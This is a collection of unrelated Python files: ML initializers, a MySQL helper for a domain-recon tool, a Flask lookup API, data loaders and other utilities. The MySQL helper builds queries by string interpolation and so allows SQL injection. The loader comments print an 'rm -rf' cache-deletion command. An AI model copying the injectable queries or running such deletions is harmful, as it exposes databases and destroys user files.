forward pass. Choosing ``'fan_out'`` preserves the magnitudes in the
backwards pass.
nonlinearity (str, optional): the non-linear function (`nn.functional` name),
recommended to use only with ``'relu'`` or ``'leaky_relu'`` (default).
"""
# adapted from torch.nn.init
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
if 0 in tensor.shape:
warnings.warn("Initializing zero-element tensors is a no-op")
return tensor
if mode == 'fan_in':
assert fan_in is not None, 'Fan_in is not provided.'
fan = fan_in
elif mode == 'fan_out':
assert fan_out is not None, 'Fan_out is not provided.'
fan = fan_out
else:
raise ValueError(f'Invalid initialization mode \'{mode}\'')
std = nn.init.calculate_gain(nonlinearity, a) / math.sqrt(fan)
bound = math.sqrt(3.) * std
return nn.init.uniform_(tensor, -bound, bound)
return initializer
def kaiming_normal_(a=0, mode='fan_in', nonlinearity='leaky_relu'):
r"""Return the initializer filling the input `Tensor` with values according to the method
described in `Delving deep into rectifiers: Surpassing human-level
performance on ImageNet classification` - He, K. et al. (2015), using a
normal distribution. The resulting tensor will have values sampled from
:math:`\mathcal{N}(0, \text{std}^2)` where
.. math::
\text{std} = \frac{\text{gain}}{\sqrt{\text{fan_mode}}}
Also known as 'He initialization'.
Args:
a (int): the negative slope of the rectifier used after this layer (only used with ``'leaky_relu'``).
mode (str, optional): either ``'fan_in'`` (default) or ``'fan_out'``. Choosing ``'fan_in'``
preserves the magnitude of the variance of the weights in the
forward pass. Choosing ``'fan_out'`` preserves the magnitudes in the
backwards pass.
nonlinearity (str, optional): the non-linear function (`nn.functional` name),
recommended to use only with ``'relu'`` or ``'leaky_relu'`` (default).
"""
# adapted from torch.nn.init
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
if 0 in tensor.shape:
warnings.warn("Initializing zero-element tensors is a no-op")
return tensor
if mode == 'fan_in':
assert fan_in is not None, 'Fan_in is not provided.'
fan = fan_in
elif mode == 'fan_out':
assert fan_out is not None, 'Fan_out is not provided.'
fan = fan_out
else:
raise ValueError(f'Invalid initialization mode \'{mode}\'')
std = nn.init.calculate_gain(nonlinearity, a) / math.sqrt(fan)
return nn.init.normal_(tensor, 0, std)
return initializer
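# Usage sketch for the factories above (shapes and fan values are assumptions):
# init_fn = kaiming_normal_(nonlinearity='relu')
# weight = torch.empty(64, 128)            # requires `import torch`
# init_fn(weight, fan_in=128, fan_out=64)  # fills `weight` in place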
def xavier_uniform_(a: float = math.sqrt(3.), scale: float = 2., gain: float = 1.):
r"""Return the initializer filling the input `Tensor` with values according to the method
described in `Understanding the difficulty of training deep feedforward
neural networks` - Glorot, X. & Bengio, Y. (2010), using a uniform
distribution. The resulting tensor will have values sampled from
:math:`\mathcal{U}(-a, a)` where
.. math::
a = \text{gain} \times \sqrt{\frac{6}{\text{fan_in} + \text{fan_out}}}
Also known as 'Glorot initialization'.
Args:
a (float, optional): an optional scaling factor used to calculate uniform
bounds from standard deviation. Defaults ``math.sqrt(3.)``.
scale (float, optional): an optional scaling factor used to calculate standard deviation. Defaults 2.0.
gain (float, optional): an optional scaling factor. Defaults 1.0.
"""
# adapted from torch.nn.init
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
assert fan_in is not None, 'Fan_in is not provided.'
fan = fan_in
if fan_out is not None:
fan += fan_out
std = gain * math.sqrt(scale / float(fan))
bound = a * std
return nn.init.uniform_(tensor, -bound, bound)
return initializer
def xavier_normal_(scale: float = 2., gain: float = 1.):
r"""Return the initializer filling the input `Tensor` with values according to the method
described in `Understanding the difficulty of training deep feedforward
neural networks` - Glorot, X. & Bengio, Y. (2010), using a normal
distribution. The resulting tensor will have values sampled from
:math:`\mathcal{N}(0, \text{std}^2)` where
.. math::
\text{std} = \text{gain} \times \sqrt{\frac{2}{\text{fan_in} + \text{fan_out}}}
Also known as 'Glorot initialization'.
Args:
scale (float, optional): an optional scaling factor used to calculate standard deviation. Defaults 2.0.
gain (float, optional): an optional scaling factor. Defaults 1.0.
"""
# adapted from torch.nn.init
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
assert fan_in is not None, 'Fan_in is not provided.'
fan = fan_in
if fan_out is not None:
fan += fan_out
std = gain * math.sqrt(scale / float(fan))
return nn.init.normal_(tensor, 0., std)
return initializer
def lecun_uniform_():
# adapted from jax.nn.initializers
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
assert fan_in is not None, 'Fan_in is not provided.'
var = 1.0 / fan_in
bound = math.sqrt(3 * var)
return nn.init.uniform_(tensor, -bound, bound)
return initializer
def lecun_normal_():
# adapted from jax.nn.initializers
def initializer(tensor: Tensor, fan_in: int = None, fan_out: int = None):
assert fan_in is not None, 'Fan_in is not provided.'
std = math.sqrt(1.0 / fan_in)
return nn.init.trunc_normal_(tensor, std=std / .87962566103423978)
return initializer | python |
#!/usr/bin/python
# Filename: mysqlfunc.py
# Purpose: All the mysql functions
# !!! need to encapsulate a cur with something like a using statement
# Database errors
import MySQLdb, pdb, logger, dnsCheck
from MySQLdb import Error
#All the variables for paths
from variables import *
def create_dbConnection():
try:
# trying to create a connection with the proceeding connection
a = MySQLdb.connect(user=databaseUser, passwd=databasePasswd, db=databaseName, unix_socket="/opt/lampp/var/mysql/mysql.sock")
return a
except Error as e:
print(e)
return None
def sqlExeCommit(statem):
conn = create_dbConnection()
cur = conn.cursor()
cur.execute(statem)
conn.commit()
def sqlCommit(conn):
conn.commit()
# Only execute
def sqlExe(cur, statem):
cur.execute(statem)
# Execute return
def sqlExeRet(statem):
conn = create_dbConnection()
cur = conn.cursor()
cur.execute(statem)
return cur.fetchall()
def sqlExeRetOne(statem):
conn = create_dbConnection()
cur = conn.cursor()
cur.execute(statem)
return cur.fetchone()
# Returns the domains based on the domainRangeId
def domainsBydomainRangeId(id):
conn = create_dbConnection()
cur = conn.cursor()
statem = "SELECT domainName FROM Domains WHERE domainRangeId = %s"%str(id)
cur.execute(statem)
results = []
for column in cur.fetchall():
results.append(column[0])
return results
# Returns the domain ids based on the domainRangeId
def domainIdsBydomainRangeId(id):
conn = create_dbConnection()
cur = conn.cursor()
statem = "SELECT domainId FROM Domains WHERE domainRangeId = %s"%str(id)
cur.execute(statem)
results = []
for column in cur.fetchall():
results.append(int(column[0]))
return results
# Returns the domain name for a given domainId
def domainNameByDomainId(id):
conn = create_dbConnection()
cur = conn.cursor()
statem = "SELECT domainName FROM Domains WHERE domainId = %s"%str(id)
cur.execute(statem)
return cur.fetchone()[0]
# Return the domainRange value associated with the rangeId
def domainRangeByrangeId(cur, id):
statem = "SELECT domainRange FROM InScope WHERE domainRangeId = %s"%str(id)
cur.execute(statem)
return cur.fetchone()[0]
# Return all scope Ids
def AllScopeIds():
conn = create_dbConnection()
cur = conn.cursor()
# Container for the scope ids
ScopeIds = []
# Grab all the InScopeIds based on the programName
statem = "SELECT domainRangeId FROM InScope"
cur.execute(statem)
for column in cur.fetchall():
ScopeIds.append(int(column[0]))
return ScopeIds
#Good for iterates on own commit
def insertDomain(domain, domainRangeId):
conn = create_dbConnection()
cur = conn.cursor()
# checkInternet
if dnsCheck.checkHostByName(domain):
# pdb catch in case something goes wrong
# Find ips
try:
# Insert into Domains
statem = "INSERT IGNORE INTO Domains(domainRangeId, domainName, dateFound) VALUES (%s, \"%s\", CURDATE())"%(domainRangeId, domain)
cur.execute(statem)
print '[+] New Domain:',domain
logger.logNewDomain(domain)
except Exception,e:
print e
pdb.set_trace()
# Commit
conn.commit()
def removeDomain(domain):
conn = create_dbConnection()
cur = conn.cursor()
cur.execute('DELETE FROM Domains WHERE domainName like \'%s\''%(domain))
conn.commit()
def removeDomainArray(domainArray):
conn = create_dbConnection()
cur = conn.cursor()
for domain in domainArray:
cur.execute('DELETE FROM Ips WHERE domainId = (SELECT domainId FROM Domains where domainName = \'%s\')'%(domain))
cur.execute('DELETE FROM Domains WHERE domainName like \'%s\''%(domain))
conn.commit()
def returnAllDomains(cur):
statem = "SELECT domainName FROM Domains"
cur.execute(statem)
results = []
for column in cur.fetchall():
results.append(column[0])
return results
# Returns an Array of inScope Ids based on the program
# oldName: returnInScopeIds
def InScopeIdsByProgramName(program):
conn = create_dbConnection()
cur = conn.cursor()
statem = "SELECT domainRangeId FROM InScope WHERE programId = (SELECT programId FROM Programs WHERE name = \"%s\")"%(program)
results = []
cur.execute(statem)
for a in cur.fetchall():
results.append(int(a[0]))
return results
def programNameByProgramId(programId):
conn = create_dbConnection()
cur = conn.cursor()
statem = "SELECT name from Programs WHERE programId = %s"%programId
cur.execute(statem)
return cur.fetchone()[0]
def ProgramIdByProgramName(programName):
conn = create_dbConnection()
cur = conn.cursor()
statem = "SELECT programId from Programs WHERE Programs = %s"%programId
cur.execute(statem)
return cur.fetchone()[0]
def blacklistedByDomainRangeId(cur, id):
statem = "SELECT blacklistedContent FROM BlacklistedDomains WHERE domainRangeId = %s"%str(id)
cur.execute(statem)
results = []
for a in cur.fetchall():
results.append(a[0])
return results | python |
#!/usr/bin/env python
import functools
import os
import os.path
from datetime import timedelta
from functools import update_wrapper
from flask import Flask, abort, current_app, jsonify, make_response, request
import psycopg2
DATABASE = os.environ['POSTGRES_DB']
USERNAME = os.environ['POSTGRES_USER']
PASSWORD = os.environ['POSTGRES_PASSWORD']
QUERY_FORMAT = """
SELECT elect_div FROM com_elb WHERE
ST_Contains(geom, ST_SetSRID(ST_Point({longitude:f}, {latitude:f}), 4283))
"""
app = Flask(__name__)
if not app.debug:
import logging
from logging.handlers import RotatingFileHandler
logfile = os.path.expanduser('/home/docker/logs/division.log')
file_handler = RotatingFileHandler(logfile)
file_handler.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
translation_table = str.maketrans('', '', " -'")
def crossdomain(origin=None, methods=None, headers=None,
max_age=21600, attach_to_all=True,
automatic_options=True):
if methods is not None:
methods = ', '.join(sorted(x.upper() for x in methods))
if headers is not None and not isinstance(headers, str):
headers = ', '.join(x.upper() for x in headers)
if not isinstance(origin, str):
origin = ', '.join(origin)
if isinstance(max_age, timedelta):
max_age = max_age.total_seconds()
def get_methods():
if methods is not None:
return methods
options_resp = current_app.make_default_options_response()
return options_resp.headers['allow']
def decorator(f):
def wrapped_function(*args, **kwargs):
if automatic_options and request.method == 'OPTIONS':
resp = current_app.make_default_options_response()
else:
resp = make_response(f(*args, **kwargs))
if not attach_to_all and request.method != 'OPTIONS':
return resp
h = resp.headers
h['Access-Control-Allow-Origin'] = origin
h['Access-Control-Allow-Methods'] = get_methods()
h['Access-Control-Max-Age'] = str(max_age)
if headers is not None:
h['Access-Control-Allow-Headers'] = headers
return resp
f.provide_automatic_options = False
return update_wrapper(wrapped_function, f)
return decorator
@app.route('/division', methods=['GET', 'POST', 'OPTIONS'])
@crossdomain(origin='*', headers=['Content-Type', 'X-Requested-With'])
def division_lookup():
if request.json is None and request.method == 'POST':
abort(400, "Must provide JSON (did you set Content-type?)")
elif request.method == 'POST':
args = request.json
else:
args = request.args
if 'latitude' not in args:
abort(400, "Most provide latitude and longitude")
if 'longitude' not in args:
abort(400, "Most provide latitude and longitude")
conn = psycopg2.connect(host='postgres', database=DATABASE,
user=USERNAME, password=PASSWORD)
cursor = conn.cursor()
cursor.execute(QUERY_FORMAT.format(latitude=float(args['latitude']),
longitude=float(args['longitude'])))
result = cursor.fetchone()
if result is None:
name = None
else:
name = result[0].lower().translate(translation_table)
return jsonify({'division': name})
if __name__ == '__main__':
app.run(debug=True)
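# Example request against a local run (host, port, and coordinates are assumptions):
#   curl 'http://localhost:5000/division?latitude=-33.86&longitude=151.21'
#   -> {"division": "sydney"}  (name lower-cased, with spaces/hyphens/apostrophes removed)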
| python |
from botcity.core import DesktopBot
# Uncomment the line below for integrations with BotMaestro
# Using the Maestro SDK
# from botcity.maestro import *
class Bot(DesktopBot):
def action(self, execution=None):
# Fetch the Activity ID from the task:
# task = self.maestro.get_task(execution.task_id)
# activity_id = task.activity_id
# Opens the BotCity website.
self.browse("http://www.botcity.dev")
# Uncomment to mark this task as finished on BotMaestro
# self.maestro.finish_task(
# task_id=execution.task_id,
# status=AutomationTaskFinishStatus.SUCCESS,
# message="Task Finished OK."
# )
def not_found(self, label):
print(f"Element not found: {label}")
if __name__ == '__main__':
Bot.main()
| python |
import os
from ibm_cloud_sdk_core.authenticators import IAMAuthenticator
from ibm_watson import PersonalityInsightsV3
from services.base import BaseService, BaseServiceResult
class IBMWatson(BaseService):
"""
IBM Watson service wrapper
"""
def __init__(self, service_wrapper, service_url):
"""
Initiate the service engine
:param service_wrapper: IBM Watson service engine
:type service_wrapper: PersonalityInsightsV3
:param service_url: IBM Watson service URL address
:type service_url: str
"""
super().__init__("ibm", service_url)
self.service = service_wrapper
def get_personality_scores(self, text_content):
"""
Get personality scores from textual content
:param text_content: Textual data of minimum 100 words
:type text_content: str
:return: Results from service engine
:rtype: dict
"""
result = self.service.profile(
{"contentItems": [{"content": text_content}]},
accept="application/json",
raw_scores=True,
consumption_preferences=True,
).get_result()
return BaseServiceResult(200, result)
PERSONALITY_API_KEY = os.getenv("PERSONALITY_API_KEY")
PERSONALITY_URL = os.getenv("PERSONALITY_URL")
PERSONALITY_ENGINE = PersonalityInsightsV3(
version="2017-10-13", authenticator=IAMAuthenticator(apikey=PERSONALITY_API_KEY)
)
PERSONALITY_ENGINE.set_service_url(PERSONALITY_URL)
IBMWatsonService = IBMWatson(PERSONALITY_ENGINE, PERSONALITY_URL)
| python |
#!/usr/bin/python3
# creates the SQLite database file - run this first
import sqlite3
# create db file
con = sqlite3.connect('./db/ic_log1_2020-06-30_manual.db')
cur = con.cursor()
# create table
cur.execute('''CREATE TABLE IF NOT EXISTS iclog (date real, ic integer, note text)''')
# close the connection
con.close()
'''
Legend:
date: a UNIX timestamp (stored as REAL)
ic: internet connection boolean true or false, 1 | 0
note: short description of the problem
'''
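# Example row insert (illustrative; reopen the connection first with sqlite3.connect):
# cur.execute("INSERT INTO iclog VALUES (?, ?, ?)", (1593475200.0, 1, 'ok'))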
| python |
# -*- coding: utf-8 -*-
def main():
n, m = map(int, input().split())
summed = 4 * n - m
xy = list()
# 2x + 3y + 4z = M
# solved together with x + y + z = N
# See:
# https://atcoder.jp/contests/abc006/submissions/1112016
# Cause of the WA: I assumed the boundary of the infeasible case was <= 0, and missed the second condition
if summed < 0:
print(-1, -1, -1)
exit()
# fix x and iterate
for x in range(summed // 2 + 1):
y = summed - 2 * x
if y >= 0:
xy.append((x, y))
for x, y in xy:
z = n - (x + y)
if z >= 0:
print(x, y, z)
exit()
print(-1, -1, -1)
if __name__ == '__main__':
main()
| python |
#!/usr/bin/env python
"""
--------------------------------------------------------------------------------
Created: Jackson Lee 7/8/14
This script reads in a fasta or fastq and filters for sequences greater or less
than a threshold length
Input fastq file
@2402:1:1101:1392:2236/2
GATAGTCTTCGGCGCCATCGTCATCCTCTACACCCTCAAGGCGAGCGGCGCGATGGAGACAATCCAGTGGGGCATGCAGCAGGTGACACCGGACTCCCGGATCCA
+
@@CFFFFFGHHHHIJJIIJIHIJIIIIJIIGEIJJIJJJJJIIIJHFFDDBD8BBD>BCBCCDDDCDCCCDBDDDDDDDDDDD<CDDDDDDDDBBCDDBD<<BDD
--------------------------------------------------------------------------------
usage: filter_fasta_by_len.py -i sequence.fasta -g filter_greater_than -l filter_less_than
"""
#-------------------------------------------------------------------------------
#Header - Linkers, Libs, Constants
from Bio import SeqIO
from argparse import ArgumentParser, RawDescriptionHelpFormatter
#-------------------------------------------------------------------------------
#function declarations
def process_and_generate(input_iterator, threshold, greaterflag):
"""Reusable generator that filters records by length, yielding them one at a time.
input_iterator is an iterator that returns one record at a time
threshold is the length cutoff; greaterflag selects whether records
longer (True) or shorter (False) than the threshold are dropped
"""
for rec in input_iterator:
if greaterflag:
if len(rec.seq) <= threshold:
yield rec
else:
if len(rec.seq) >= threshold:
yield rec
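# Usage sketch: with greaterflag=True the generator drops records longer than the
# threshold, e.g. lazily keeping only reads of length <= 100:
# short_reads = process_and_generate(SeqIO.parse(handle, "fasta"), 100, True)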
#-------------------------------------------------------------------------------
#Body
print "Running..."
if __name__ == '__main__':
parser = ArgumentParser(usage = "filter_fasta_by_len.py -i sequence.fasta -g filter_greater_than -l filter_less_than",
description=__doc__,
formatter_class=RawDescriptionHelpFormatter)
parser.add_argument("-i", "--input_fastq", action="store",
dest="inputfilename",
help="fastq file of input sequences")
parser.add_argument("-g", "--filter_greater_than", action="store", type=int,
dest="greaterthan",
help="filter out sequences greater than or equal to \
this size")
parser.add_argument("-l", "--filter_less_than", action="store", type=int,
dest="lessthan",
help="filter out sequences less than or equal this size")
options = parser.parse_args()
mandatories = ["inputfilename"]
for m in mandatories:
if not options.__dict__[m]:
print "\nError: Missing Arguments\n"
parser.print_help()
exit(-1)
inputfilename = options.inputfilename
left, __, right = inputfilename.rpartition('.')
fasta =['fa','fasta','faa','fas', 'fna']
fastq =['fq','fastq']
if right in fasta:
ext = "fasta"
elif right in fastq:
ext = "fastq"
else:
print "\nError: Unrecognized file extension: " + right + "\n"
parser.print_help()
exit(-1)
print "Processing read file: " + inputfilename
with open(inputfilename,'U') as infile:
parse_iterator = SeqIO.parse(infile, ext)
if options.greaterthan == None and options.lessthan == None:
print "\nError: Missing Comparison Value\n"
parser.print_help()
exit(-1)
elif options.greaterthan == None and options.lessthan != None:
lessthan = options.lessthan
print "and filtering out sequences less than ", lessthan
outputfilename = left + '.filtered.lessthan.' + str(lessthan) + "." + right
with open(outputfilename, 'w') as outfile:
record_generator = process_and_generate(parse_iterator, lessthan, False)
SeqIO.write(record_generator, outfile, ext)
elif options.greaterthan != None and options.lessthan == None:
greaterthan = options.greaterthan
print "and filtering out sequences greater than ", greaterthan
outputfilename = left + '.filtered.greaterthan.' + str(greaterthan) + "." + right
with open(outputfilename, 'w') as outfile:
record_generator = process_and_generate(parse_iterator, greaterthan, True)
SeqIO.write(record_generator, outfile, ext)
elif options.greaterthan != None and options.lessthan != None:
greaterthan = options.greaterthan
lessthan = options.lessthan
print "and filtering out sequences less than ", lessthan, " and greater than ", greaterthan
outputfilename = left + '.filtered.greaterthan.' + str(greaterthan) + ".filtered.lessthan." + str(lessthan) + '.' + right
with open(outputfilename, 'w') as outfile:
pre_record_generator = process_and_generate(parse_iterator, greaterthan, True)
record_generator = process_and_generate(pre_record_generator, lessthan, False)
SeqIO.write(record_generator, outfile, ext)
print "Done!"
| python |
import numpy as np
from os import listdir
from os.path import join
#def random_shift_events(events, max_shift=20, resolution=(180, 240)):
def random_shift_events(events, f, max_shift=20, resolution=(195, 346)):
H, W = resolution
x_shift, y_shift = np.random.randint(-max_shift, max_shift+1, size=(2,))
#print('rm -rf ~/cachefs/erl/' + f)
#print(events.shape)
#print(events[:,0])
#print(events[:,1])
events[:,0] += x_shift
events[:,1] += y_shift
valid_events = (events[:,0] >= 0) & (events[:,0] < W) & (events[:,1] >= 0) & (events[:,1] < H)
events = events[valid_events]
return events
#def random_flip_events_along_x(events, resolution=(180, 240), p=0.5):
def random_flip_events_along_x(events, resolution=(195, 346), p=0.5):
H, W = resolution
if np.random.random() < p:
events[:,0] = W - 1 - events[:,0]
return events
class NCaltech101:
def __init__(self, root, augmentation=False):
self.classes = listdir(root)
self.files = []
self.labels = []
self.augmentation = augmentation
for i, c in enumerate(self.classes):
new_files = [join(root, c, f) for f in listdir(join(root, c))]
self.files += new_files
self.labels += [i] * len(new_files)
def __len__(self):
return len(self.files)
def __getitem__(self, idx):
"""
returns events and label, loading events from aedat
:param idx:
:return: x,y,t,p, label
"""
label = self.labels[idx]
f = self.files[idx]
#print('rm -rf ~/cachefs/erl/' + f)
events = np.load(f).astype(np.float32)
if self.augmentation:
events = random_shift_events(events, f)
events = random_flip_events_along_x(events)
return events, label
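# Usage sketch (the root path is an assumption):
# dataset = NCaltech101('./N-Caltech101/training', augmentation=True)
# events, label = dataset[0]  # events: (N, 4) float32 array of x, y, t, p columns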
| python |
import json
import cryptography.fernet
from django.conf import settings
from django.utils.encoding import force_bytes, force_text
from django_pgjson.fields import get_encoder_class
import six
# Allow the use of key rotation
if isinstance(settings.FIELD_ENCRYPTION_KEY, (tuple, list)):
keys = [
cryptography.fernet.Fernet(k)
for k in settings.FIELD_ENCRYPTION_KEY
]
elif isinstance(settings.FIELD_ENCRYPTION_KEY, dict):
# allow the keys to be indexed in a dictionary
keys = [
cryptography.fernet.Fernet(k)
for k in settings.FIELD_ENCRYPTION_KEY.values()
]
else:
# else turn the single key into a list of one
keys = [cryptography.fernet.Fernet(settings.FIELD_ENCRYPTION_KEY), ]
crypter = cryptography.fernet.MultiFernet(keys)
def no_op_encrypt_values(data, encrypter=None, skip_keys=None):
"""
A noop function with the same call signature as `encrypt_values`.
Returns:
obj - returns the data parameter unaltered.
"""
return data
def pick_encrypter(key, keys, encrypter):
"""
Returns encrypting function.
To facilitate skipping keys during encryption we need to pick between the
encrypting function or a noop function.
Returns:
function
"""
if key in keys:
return no_op_encrypt_values
return encrypter
def encrypt_values(data, encrypter=None, skip_keys=None):
"""
Returns data with values it contains recursively encrypted.
Note that this will use `json.dumps` to convert the data to a string type.
The encoder class will be the value of `PGJSON_ENCODER_CLASS` in the
settings or `django.core.serializers.json.DjangoJSONEncoder`.
Arguments:
data (object): the data to decrypt.
encrypter (function): the decryption function to use. If not
specified it will use the
cryptography.fernet.MultiFernet.encrypt method
with the keys being taken from settings.FIELD_ENCRYPTION_KEY
skip_keys (list[str]): a list of keys that should not be encrypted
Returns:
object
"""
if skip_keys is None:
skip_keys = []
encrypter = encrypter or crypter.encrypt
if isinstance(data, (list, tuple, set)):
return [encrypt_values(x, encrypter, skip_keys) for x in data]
if isinstance(data, dict):
return {
key: pick_encrypter(key, skip_keys, encrypt_values)(
value, encrypter, skip_keys)
for key, value in six.iteritems(data)
}
if isinstance(data, six.string_types):
return force_text(encrypter(data.encode('unicode_escape')))
return force_text(encrypter(
force_bytes(json.dumps(data, cls=get_encoder_class()))
))
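# Round-trip sketch (key and payload are assumptions; requires a valid
# settings.FIELD_ENCRYPTION_KEY):
# data = {'ssn': '123-45-6789', 'public_id': 42}
# token_dict = encrypt_values(data, skip_keys=['public_id'])  # 'public_id' left as-is
# decrypt_values(token_dict) == data  # should hold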
def decrypt_values(data, decrypter=None):
"""
Returns data with values it contains recursively decrypted.
Note that this will use `json.loads` to convert the decrypted data to
its most likely python type.
Arguments:
data (object): the data to decrypt.
decrypter (function): the decryption function to use. If not
specified it will use the
cryptography.fernet.MultiFernet.decrypt method
with the keys being taken from settings.FIELD_ENCRYPTION_KEY
Returns:
object
"""
decrypter = decrypter or crypter.decrypt
if isinstance(data, (list, tuple, set)):
return [decrypt_values(x, decrypter) for x in data]
if isinstance(data, dict):
return {
key: decrypt_values(value, decrypter)
for key, value in six.iteritems(data)
}
if isinstance(data, six.string_types):
# string data! if we got a string or unicode convert it to
# bytes first, as per http://stackoverflow.com/a/11174804.
#
# Note 1: This is required for the decrypter, it only accepts bytes.
# Note 2: this is primarily needed because the decrypt method is called
# on the value during the save as well as during the read, by the
# django ORM.
data = data.encode('unicode_escape')
try:
# decrypt the bytes data
value = decrypter(data)
except TypeError:
# Not bytes data??! probably from a django field calling
# to_python during value assignment
value = data
except cryptography.fernet.InvalidToken:
# Either the data is corrupted, e.g. a lost key or the data
# was never encrypted, this could be from django calling to_python
# during value assignment.
value = data
try:
# undo the unicode mess from earlier
value = value.decode('unicode_escape')
except AttributeError:
pass
try:
return json.loads(value)
except (ValueError, TypeError):
# Not valid json, just return the value
return value
| python |
from pptx import Presentation
from pptx.util import Inches
import pyexcel as pe
print("""
Exemplo de criação de apresentação PPTX em loop utilizando dados de Excel
Vish, o bagulho foi loko pra conseguir criar este aplicativo mano
-> agora aprendi, já era
Day 24 Code Python - 23/05/2018
""")
dadosExcel = pe.iget_records(file_name="apresentacao_automatica.xlsx") # try to factor this into a function
prs = Presentation() # to read an existing PPTX, pass its path as a parameter
title_only_slide_layout = prs.slide_layouts[5]
slide = prs.slides.add_slide(title_only_slide_layout)
shapes = slide.shapes
shapes.title.text = 'Idades -> Feito com Python'
# row/column setup --> still need to figure out how to automate these sizes, it's tricky
rows = 5
cols = 2
left = top = Inches(2.0)
width = Inches(6.0)
height = Inches(0.8)
table = shapes.add_table(rows, cols, left, top, width, height).table
# column widths
table.columns[0].width = Inches(3.0)
table.columns[1].width = Inches(2.0)
# column names - fixed at row 0
table.cell(0, 0).text = 'Nome'
table.cell(0, 1).text = 'Idade'
cont = 1
for itens in dadosExcel:
# writing the data into the cells
if cont > 0: # row 0 will always be the header, which is fixed.
table.cell(cont, 0).text = str(itens['nome'])
table.cell(cont, 1).text = str(itens['idade'])
cont += 1
# freeing the resource
pe.free_resources()
# saving the pptx file
prs.save('apresentacao_tabela_automatica.pptx')
print('-' * 34)
print('PRESENTATION CREATED SUCCESSFULLY.')
| python |
"""
This sample shows how to create a list in json
of all items in a group
Python 2.x/3.x
ArcREST 3.5.6
"""
from __future__ import print_function
from __future__ import absolute_import
import arcrest
import os
import json
from arcresthelper import orgtools, common
import csv
import sys
from arcresthelper.packages import six
def trace():
"""
trace finds the line, the filename
and error message and returns it
to the user
"""
import traceback, inspect,sys
tb = sys.exc_info()[2]
tbinfo = traceback.format_tb(tb)[0]
filename = inspect.getfile(inspect.currentframe())
# script name + line number
line = tbinfo.split(", ")[1]
# Get Python syntax error
#
synerror = traceback.format_exc().splitlines()[-1]
return line, filename, synerror
def _unicode_convert(obj):
""" converts unicode to anscii """
if isinstance(obj, dict):
return {_unicode_convert(key): _unicode_convert(value) for key, value in obj.items()}
elif isinstance(obj, list):
return [_unicode_convert(element) for element in obj]
elif isinstance(obj, str):
return obj
elif isinstance(obj, six.text_type):
return obj.encode('utf-8')
elif isinstance(obj, six.integer_types):
return obj
else:
return obj
if __name__ == "__main__":
proxy_port = None
proxy_url = None
securityinfo = {}
securityinfo['security_type'] = 'Portal'#LDAP, NTLM, OAuth, Portal, PKI
securityinfo['username'] = ""#<UserName>
securityinfo['password'] = ""#<Password>
securityinfo['org_url'] = "http://www.arcgis.com"
securityinfo['proxy_url'] = proxy_url
securityinfo['proxy_port'] = proxy_port
securityinfo['referer_url'] = None
securityinfo['token_url'] = None
securityinfo['certificatefile'] = None
securityinfo['keyfile'] = None
securityinfo['client_id'] = None
securityinfo['secret_id'] = None
groups = ["Demographic Content"] #Name of groups
outputlocation = r"C:\TEMP"
outputfilename = "group.json"
outputitemID = "id.csv"
try:
orgt = orgtools.orgtools(securityinfo)
groupRes = []
if orgt.valid:
fileName = os.path.join(outputlocation,outputfilename)
csvFile = os.path.join(outputlocation,outputitemID)
iconPath = os.path.join(outputlocation,"icons")
if not os.path.exists(iconPath):
os.makedirs(iconPath)
if sys.version_info[0] == 2:
access = 'wb+'
kwargs = {}
else:
access = 'wt+'
kwargs = {'newline':''}
file = open(fileName, "w")
            with open(csvFile, access, **kwargs) as csvHandle:
                idwriter = csv.writer(csvHandle)
for groupName in groups:
results = orgt.getGroupContent(groupName=groupName,
onlyInOrg=True,
onlyInUser=True)
                    if results is not None:
for result in results:
idwriter.writerow([result['title'],result['id']])
thumbLocal = orgt.getThumbnailForItem(itemId=result['id'],
fileName=result['title'],
filePath=iconPath)
result['thumbnail']=thumbLocal
groupRes.append(result)
if len(groupRes) > 0:
print ("%s items found" % str(len(groupRes)))
groupRes = _unicode_convert(groupRes)
file.write(json.dumps(groupRes, ensure_ascii=False, sort_keys=True, indent=4, separators=(',', ': ')))
file.close()
except (common.ArcRestHelperError) as e:
print ("error in function: %s" % e[0]['function'])
print ("error on line: %s" % e[0]['line'])
print ("error in file name: %s" % e[0]['filename'])
print ("with error message: %s" % e[0]['synerror'])
if 'arcpyError' in e[0]:
print ("with arcpy message: %s" % e[0]['arcpyError'])
except:
line, filename, synerror = trace()
print ("error on line: %s" % line)
print ("error in file name: %s" % filename)
print ("with error message: %s" % synerror) | python |
def get_customized_mapping(cls):
mapping = {
"name": {
"type": "text",
"copy_to": [
"all"
]
},
"is_public": {
"type": "boolean"
},
"taxid": {
"type": "integer"
},
"genes": {
"properties": {
"mygene_id": {
"normalizer": "keyword_lowercase_normalizer",
"type": "keyword"
},
"symbol": {
"normalizer": "keyword_lowercase_normalizer",
"type": "keyword"
},
"ncbigene": {
"normalizer": "keyword_lowercase_normalizer",
"type": "keyword"
},
"ensemblgene": {
"normalizer": "keyword_lowercase_normalizer",
"type": "keyword"
},
"uniprot": {
"normalizer": "keyword_lowercase_normalizer",
"type": "keyword"
},
"name": {
"type": "text"
}
}
},
"reactome": {
"properties": {
"id": {
"normalizer": "keyword_lowercase_normalizer",
"type": "keyword",
"copy_to": [
"all"
]
},
"geneset_name": {
"type": "text"
}
}
}
}
return mapping
| python |
#!/usr/bin/env python
#
# Copyright (C) 2007 British Broadcasting Corporation and Kamaelia Contributors(1)
# All Rights Reserved.
#
# You may only modify and redistribute this under the terms of any of the
# following licenses(2): Mozilla Public License, V1.1, GNU General
# Public License, V2.0, GNU Lesser General Public License, V2.1
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://kamaelia.sourceforge.net/AUTHORS - please extend this file,
# not this notice.
# (2) Reproduced in the COPYING file, and at:
# http://kamaelia.sourceforge.net/COPYING
# Under section 3.5 of the MPL, we are using this text since we deem the MPL
# notice inappropriate for this file. As per MPL/GPL/LGPL removal of this
# notice is prohibited.
#
# Please contact us via: kamaelia-list-owner@lists.sourceforge.net
# to discuss alternative licensing.
# -------------------------------------------------------------------------
#
from Kamaelia.UI.Pygame.Button import Button
from Kamaelia.Chassis.Graphline import Graphline
colours = { "black" : (0,0,0),
"red" : (192,0,0),
"orange" : (192,96,0),
"yellow" : (160,160,0),
"green" : (0,192,0),
"turquoise" : (0,160,160),
"blue": (0,0,255),
"purple" : (192,0,192),
"darkgrey" : (96,96,96),
